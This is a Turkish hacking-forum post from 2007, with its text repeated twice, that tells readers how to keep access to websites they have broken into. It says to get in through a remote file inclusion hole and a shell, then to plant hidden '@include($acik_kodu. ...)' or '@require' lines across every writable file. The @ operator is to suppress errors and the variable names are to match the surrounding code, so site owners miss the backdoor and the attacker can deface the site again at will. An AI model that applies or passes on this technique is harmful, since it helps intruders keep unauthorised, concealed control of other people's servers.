egeden_35
05-03-2007, 02:48 PM
Gezerken rastladım .belki bazılarının işne yarar diye düşündüm.
index atıp bırakmayın, sıkıldıkca indexleyin
--------------------------------------------------------------------------------
şimdi arkadaşlar bildiğiniz gibi bir web sitesini hacklemek eğer açık başkası tarafından verilmemişse açık bulmak baya zordur. diyelimki bir portala buradaki admin ve mod arkadaşların verdikleri açıklardan birine girdik. amacımız index atmak yada başka birşey olabilir ancak bu işlemi gerçeleştirdikten sonra web site sahibi uyanacak ve açıkları kapa yoluna gidecektir. hele birde php bilgisinden yoksun ise vay haine. o site senin bu site benim yama arar durur ama sadece herkes tarafından bilenen açıklara yama ararlar ve bişekilde kapatırlar. eğer site yurt dışında ise ve sürekli haclenmeyi hak ediyorsa ne yapıcaz dersiniz, gelin bizde sıkıldıkça index atabileceğemiz açıkları roottaki dosyalarına yayalım ve herbirinden farklı zaanlarda girelim. yeni bir yol değil bildiğimiz açık sistemini kullanacağız ( önceden yazılmışmı bilmiyorum çünkü benimde yeni aklıma geldi ).
site dosyalarında extradan açık yapmadan önce biraz php bilgisi gereklidir gelin ilk önce onları gözden geçirelim. ( php de yeni başlayanlar için )
include : bu php dosyalarında sık kullanılan dosya çağırma aracıdır. include edilen bir dosya fiziksel olarak include edilen dosyada görünmesede işlevsel olarak döngüye katılırlar. bir örnek:
a.php ve b.php dosyalarımız olsun. a dosyasını b dosyasına include edersek b.php kodlarında sadece a dosyasının adı gecer ancak a dosyasındaki işlemler harfiyen gerçekleştirilir.
require : include ile tamamen aynı çalışma prensibine sahiptir ancak bir farkı vardır. scriptte eğer require kullanırsanız, require ile çağırdığınız dosya serverda bulunmazsa script kendini orada sonlandırır ve geri kalan alanlardaki kodlar işleme dahil edilmez.
@ operatörü : hata operatörüdür. kodlamdan kaynaklı hatların tarayıcıya yansıtılmasını dolayısı ile kullanıcının görmemesini sağlar. adminler dahil görmez ve bizim işimiza çok yarayacak.
gelelim açık yaratmaya.
1) rfi açığı olan bir site bulunması gerekir ve shell ile servere girilir.
2) isteyen index atıp çıkabilir ama biz açık bırakıcaz içeri.
3) yazma hakkımız olan tüm dosyaları açarak en karışık alanlara
@include($acik_kodu. "/bilmemne.php");
bu gibi ama aynı olmayan kodlar yerleştiricez.
4) burada önemli olan bu kodun aite sahibinin görmesini engellemek siz $acik_kod değişkenini ortamdaki diğer kodlara uygun harfleme yaparsanız bulması daha da zorlaşır.
5) isteyen
@require($acik_kodu. "/bilmemne.php"); de kullanabilir ancak bana göre fazla dikkat çeker.
böylelikle tüm dosyalar değişmedikce sizin açıklarınız gecerli olacaktır. kolay gelsin.
not : include yada require i şu şekilde kullanmayın
include (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..);
bu komutlar aynı server üzerindeki dosyalar için gecerlidir.
alıntıdır!!!!! arzular şelale:)
index atıp bırakmayın, sıkıldıkca indexleyin
--------------------------------------------------------------------------------
şimdi arkadaşlar bildiğiniz gibi bir web sitesini hacklemek eğer açık başkası tarafından verilmemişse açık bulmak baya zordur. diyelimki bir portala buradaki admin ve mod arkadaşların verdikleri açıklardan birine girdik. amacımız index atmak yada başka birşey olabilir ancak bu işlemi gerçeleştirdikten sonra web site sahibi uyanacak ve açıkları kapa yoluna gidecektir. hele birde php bilgisinden yoksun ise vay haine. o site senin bu site benim yama arar durur ama sadece herkes tarafından bilenen açıklara yama ararlar ve bişekilde kapatırlar. eğer site yurt dışında ise ve sürekli haclenmeyi hak ediyorsa ne yapıcaz dersiniz, gelin bizde sıkıldıkça index atabileceğemiz açıkları roottaki dosyalarına yayalım ve herbirinden farklı zaanlarda girelim. yeni bir yol değil bildiğimiz açık sistemini kullanacağız ( önceden yazılmışmı bilmiyorum çünkü benimde yeni aklıma geldi ).
site dosyalarında extradan açık yapmadan önce biraz php bilgisi gereklidir gelin ilk önce onları gözden geçirelim. ( php de yeni başlayanlar için )
include : bu php dosyalarında sık kullanılan dosya çağırma aracıdır. include edilen bir dosya fiziksel olarak include edilen dosyada görünmesede işlevsel olarak döngüye katılırlar. bir örnek:
a.php ve b.php dosyalarımız olsun. a dosyasını b dosyasına include edersek b.php kodlarında sadece a dosyasının adı gecer ancak a dosyasındaki işlemler harfiyen gerçekleştirilir.
require : include ile tamamen aynı çalışma prensibine sahiptir ancak bir farkı vardır. scriptte eğer require kullanırsanız, require ile çağırdığınız dosya serverda bulunmazsa script kendini orada sonlandırır ve geri kalan alanlardaki kodlar işleme dahil edilmez.
@ operatörü : hata operatörüdür. kodlamdan kaynaklı hatların tarayıcıya yansıtılmasını dolayısı ile kullanıcının görmemesini sağlar. adminler dahil görmez ve bizim işimiza çok yarayacak.
gelelim açık yaratmaya.
1) rfi açığı olan bir site bulunması gerekir ve shell ile servere girilir.
2) isteyen index atıp çıkabilir ama biz açık bırakıcaz içeri.
3) yazma hakkımız olan tüm dosyaları açarak en karışık alanlara
@include($acik_kodu. "/bilmemne.php");
bu gibi ama aynı olmayan kodlar yerleştiricez.
4) burada önemli olan bu kodun aite sahibinin görmesini engellemek siz $acik_kod değişkenini ortamdaki diğer kodlara uygun harfleme yaparsanız bulması daha da zorlaşır.
5) isteyen
@require($acik_kodu. "/bilmemne.php"); de kullanabilir ancak bana göre fazla dikkat çeker.
böylelikle tüm dosyalar değişmedikce sizin açıklarınız gecerli olacaktır. kolay gelsin.
not : include yada require i şu şekilde kullanmayın
include (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..);
bu komutlar aynı server üzerindeki dosyalar için gecerlidir.
alıntıdır!!!!! arzular şelale:)